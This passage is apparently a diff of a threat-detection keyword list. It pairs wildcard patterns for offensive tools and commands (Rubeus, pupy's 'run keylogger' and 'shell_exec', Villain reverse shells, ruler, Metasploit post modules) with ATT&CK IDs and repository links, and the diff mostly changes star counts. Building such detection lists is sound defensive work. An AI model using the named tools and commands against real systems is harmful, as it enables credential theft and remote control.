Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","1","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"*Rubeus.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*Rubeus.git*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","1","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"*Rubeus.Kerberos*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. 
It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","1","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"*Rubeus.lib*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","1","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" "*rubeus.txt*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*RubeusAskTgtMenu*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*RubeusASREPRoastManager*","offensive_tool_keyword","RedPeanut","RedPeanut is a small 
RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" 
@@ -16003,37 +16184,37 @@ "*RubeusTriageManager*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*ruby CVE-202*-*.rb *","offensive_tool_keyword","POC","CVE-2023-34362: MOVEit Transfer Unauthenticated RCE","T1190.001 - T1210.002 - T1068 - T1059.001 - T1059.003","TA0005 - TA0001 - TA0002 - TA0043","N/A","N/A","Exploitation tools","https://github.com/sfewer-r7/CVE-2023-34362","1","0","N/A","N/A","1","62","24","2023-06-13T08:46:03Z","2023-06-12T12:56:12Z" "*ruby poc-cve-202*-*.rb*","offensive_tool_keyword","POC","CVE-2023-34362: MOVEit Transfer Unauthenticated RCE","T1190.001 - T1210.002 - T1068 - T1059.001 - T1059.003","TA0005 - TA0001 - TA0002 - TA0043","N/A","N/A","Exploitation tools","https://github.com/sfewer-r7/CVE-2023-34362","1","0","N/A","N/A","1","62","24","2023-06-13T08:46:03Z","2023-06-12T12:56:12Z" -"*ruby_nntpd_cmd_exec*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8794","2027","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" -"*ruby_no_sh_reverse_tcp.py*","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. 
utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","N/A","10","10","3252","534","2023-08-08T06:24:24Z","2022-10-25T22:02:59Z" -"*ruby_reverse_tcp.py*","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","N/A","10","10","3252","534","2023-08-08T06:24:24Z","2022-10-25T22:02:59Z" +"*ruby_nntpd_cmd_exec*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*ruby_no_sh_reverse_tcp.py*","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","N/A","10","10","3255","534","2023-08-08T06:24:24Z","2022-10-25T22:02:59Z" +"*ruby_reverse_tcp.py*","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. 
enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","N/A","10","10","3255","534","2023-08-08T06:24:24Z","2022-10-25T22:02:59Z" "*Rudrastra-main.zip*","offensive_tool_keyword","Rudrastra","Make a Fake wireless access point aka Evil Twin","T1491 - T1090.004 - T1557.001","TA0040 - TA0011 - TA0002","N/A","N/A","Sniffing & Spoofing","https://github.com/SxNade/Rudrastra","1","1","N/A","8","1","46","21","2023-04-22T15:10:42Z","2020-11-05T09:38:15Z" "*ruler * abk dump -o *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*ruler -k -d * brute --users *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"*ruler-linux64*","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1102.001 - T1201.001 - T1570.002","TA0006","N/A","N/A","Exploitation tools","https://github.com/sensepost/ruler","1","1","N/A","N/A","10","1991","353","2021-02-19T09:28:07Z","2016-08-18T15:05:13Z" -"*ruler-linux86*","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1102.001 - T1201.001 - 
T1570.002","TA0006","N/A","N/A","Exploitation tools","https://github.com/sensepost/ruler","1","1","N/A","N/A","10","1991","353","2021-02-19T09:28:07Z","2016-08-18T15:05:13Z" -"*ruler-osx64*","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1102.001 - T1201.001 - T1570.002","TA0006","N/A","N/A","Exploitation tools","https://github.com/sensepost/ruler","1","1","N/A","N/A","10","1991","353","2021-02-19T09:28:07Z","2016-08-18T15:05:13Z" -"*ruler-win64.exe*","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1102.001 - T1201.001 - T1570.002","TA0006","N/A","N/A","Exploitation tools","https://github.com/sensepost/ruler","1","1","N/A","N/A","10","1991","353","2021-02-19T09:28:07Z","2016-08-18T15:05:13Z" -"*ruler-win86.exe*","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1102.001 - T1201.001 - T1570.002","TA0006","N/A","N/A","Exploitation tools","https://github.com/sensepost/ruler","1","1","N/A","N/A","10","1991","353","2021-02-19T09:28:07Z","2016-08-18T15:05:13Z" -"*rules/d3ad0ne.rule*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"*run * pyshell*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","7841","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" -"*run android_cam *","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","7841","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" -"*run --bg shell_exec*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","7841","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*ruler-linux64*","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1102.001 - T1201.001 - T1570.002","TA0006","N/A","N/A","Exploitation tools","https://github.com/sensepost/ruler","1","1","N/A","N/A","10","1994","353","2021-02-19T09:28:07Z","2016-08-18T15:05:13Z" +"*ruler-linux86*","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1102.001 - T1201.001 - T1570.002","TA0006","N/A","N/A","Exploitation tools","https://github.com/sensepost/ruler","1","1","N/A","N/A","10","1994","353","2021-02-19T09:28:07Z","2016-08-18T15:05:13Z" +"*ruler-osx64*","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1102.001 - T1201.001 - T1570.002","TA0006","N/A","N/A","Exploitation tools","https://github.com/sensepost/ruler","1","1","N/A","N/A","10","1994","353","2021-02-19T09:28:07Z","2016-08-18T15:05:13Z" +"*ruler-win64.exe*","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1102.001 - T1201.001 - T1570.002","TA0006","N/A","N/A","Exploitation tools","https://github.com/sensepost/ruler","1","1","N/A","N/A","10","1994","353","2021-02-19T09:28:07Z","2016-08-18T15:05:13Z" +"*ruler-win86.exe*","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1102.001 - T1201.001 - T1570.002","TA0006","N/A","N/A","Exploitation 
tools","https://github.com/sensepost/ruler","1","1","N/A","N/A","10","1994","353","2021-02-19T09:28:07Z","2016-08-18T15:05:13Z" +"*rules/d3ad0ne.rule*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*run * pyshell*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*run android_cam *","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*run --bg shell_exec*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. 
Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" "*run -Executable *.exe*","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Apollo/","1","0","N/A","10","10","401","83","2023-08-17T14:46:04Z","2020-11-09T08:05:16Z" -"*run interactive_shell*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","7841","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" -"*run keylogger*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","7841","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" -"*run memory_exec *.*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","7841","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" -"*run mouselogger*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","7841","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*run interactive_shell*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*run keylogger*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*run memory_exec *.*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*run mouselogger*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" "*run post/windows/gather/checkvm*","offensive_tool_keyword","metasploit","Metasploit Callback Automation:Use AutoRunScript to run commands on a reverse shell callback","T1059 - T1064 - T1029","TA0002 - TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md","1","0","N/A","N/A","9","890","121","2023-10-03T19:54:40Z","2021-08-16T17:34:25Z" "*run post/windows/manage/killfw*","offensive_tool_keyword","metasploit","Metasploit Callback Automation:Use AutoRunScript to run commands on a reverse shell callback","T1059 - T1064 - T1029","TA0002 - TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md","1","0","N/A","N/A","9","890","121","2023-10-03T19:54:40Z","2021-08-16T17:34:25Z" "*run post/windows/manage/migrate*","offensive_tool_keyword","metasploit","Metasploit Callback Automation:Use AutoRunScript to run commands on a reverse shell callback","T1059 - T1064 - T1029","TA0002 - TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md","1","0","N/A","N/A","9","890","121","2023-10-03T19:54:40Z","2021-08-16T17:34:25Z" -"*run pyexec *","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","7841","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" -"*run shell_exec *","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","7841","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" -"*run shellcode_exec*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","7841","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" -"*Run the krbscm method for SYSTEM shell*","offensive_tool_keyword","S4UTomato","Escalate Service Account To LocalSystem via Kerberos","T1558 - T1558.002 - T1548.002 - T1078 - T1078.004","TA0006 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/S4UTomato","1","0","N/A","10","4","315","58","2023-09-14T08:53:19Z","2023-07-30T11:51:57Z" +"*run pyexec *","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*run shell_exec *","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
